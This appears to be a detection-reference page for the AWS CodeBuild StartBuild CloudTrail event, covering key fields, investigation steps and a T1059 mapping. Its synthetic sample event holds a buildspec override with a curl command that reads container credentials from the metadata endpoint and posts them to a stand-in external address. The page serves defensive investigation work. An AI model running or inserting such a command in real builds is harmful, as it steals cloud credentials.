Skip to content

StartBuild

AWS

StartBuild

service: AWS - CodeBuild
tactics:
techniques:

Event

Starts a build for a project, optionally overriding its source, buildspec, environment, or service role. A buildspec override can change commands; the caller initiating the build and the role used during execution are distinct. Queuing a build does not establish that commands ran.

Security Context

An unauthorized buildspec can execute shell code (T1059). Normal CI uses the same API. Access is bounded by the actual service-role policies and build environment; it is not automatically unrestricted or unlogged.

Log Source

CloudTrail management event with eventSource: codebuild.amazonaws.com and eventName: StartBuild. Inspect errorCode/errorMessage and follow-up state. A missing or null response body does not alone establish success or failure.

Key Fields

Fields below refer to requestParameters unless otherwise noted. Exact CloudTrail serialization should be checked against the original record.

FieldInvestigation value
projectName, buildspecOverrideProject and replacement build instructions.
serviceRoleOverride, sourceVersion, environmentVariablesOverrideOther relevant overrides if supplied; compare project defaults.
userIdentity, eventTime, awsRegion, eventID (top level)Caller/session, timeline, Region, and correlation identifiers.

What to Investigate

  1. Confirm the recorded outcome and compare caller, target, and timing with the approved workflow.
  2. Compare overrides, source revision, initiator, and role delegation against approved CI activity.
  3. Follow the build ID through phase outcomes, build logs, and effective service-role permissions.
  4. Validate metadata availability and outbound network evidence before claiming the sample’s attempted credential transfer succeeded.

Sample Event

Synthetic scenario. The submitted buildspec attempts credential transfer to a documentation-only address. The returned build is QUEUED/IN_PROGRESS, not proof of script execution.

Exact CloudTrail field presence, response nesting, redaction, and timestamp formatting remain unverified against captured logs. Illustrative names do not establish intent or downstream behavior.

{
"eventVersion": "1.09",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDADRAC0MALF0YBADGY",
"arn": "arn:aws:iam::555123456789:user/draco",
"accountId": "555123456789",
"accessKeyId": "ASIADRAC0MALF0YEXAMP5",
"userName": "draco",
"sessionContext": {
"attributes": {
"creationDate": "2026-04-15T18:51:02Z",
"mfaAuthenticated": "false"
}
}
},
"eventTime": "2026-04-15T20:48:51Z",
"eventSource": "codebuild.amazonaws.com",
"eventName": "StartBuild",
"awsRegion": "us-east-1",
"sourceIPAddress": "203.0.113.66",
"userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6",
"requestParameters": {
"projectName": "occamy-pipeline-build",
"buildspecOverride": "version: 0.2\nphases:\n build:\n commands:\n - curl -s 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI | curl -s --data-binary @- http://203.0.113.77/c"
},
"responseElements": {
"build": {
"id": "occamy-pipeline-build:90000000-0000-4000-8000-000110110010",
"arn": "arn:aws:codebuild:us-east-1:555123456789:build/occamy-pipeline-build:90000000-0000-4000-8000-000110110010",
"buildNumber": 137,
"startTime": "Apr 15, 2026 8:48:51 PM",
"currentPhase": "QUEUED",
"buildStatus": "IN_PROGRESS",
"projectName": "occamy-pipeline-build",
"initiator": "draco",
"serviceRole": "arn:aws:iam::555123456789:role/OccamyCodeBuildRole",
"encryptionKey": "arn:aws:kms:us-east-1:555123456789:alias/aws/s3",
"logs": {
"groupName": "/aws/codebuild/occamy-pipeline-build",
"streamName": "90000000-0000-4000-8000-000110110010"
}
}
},
"requestID": "90000000-0000-4000-8000-000110110010",
"eventID": "90000000-0000-4000-8000-000110110011",
"readOnly": false,
"eventType": "AwsApiCall",
"managementEvent": true,
"recipientAccountId": "555123456789",
"eventCategory": "Management",
"tlsDetails": {
"tlsVersion": "TLSv1.3",
"cipherSuite": "TLS_AES_128_GCM_SHA256",
"clientProvidedHostHeader": "codebuild.us-east-1.amazonaws.com"
}
}

Sources

MITRE ATT&CK Mapping

Tactics: Execution

Techniques:
  • T1059 — Command and Scripting Interpreter — Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface a...
Documentation reviewed: September 30, 2026. Samples are synthetic illustrations, not captured production logs or lab-validated fixtures.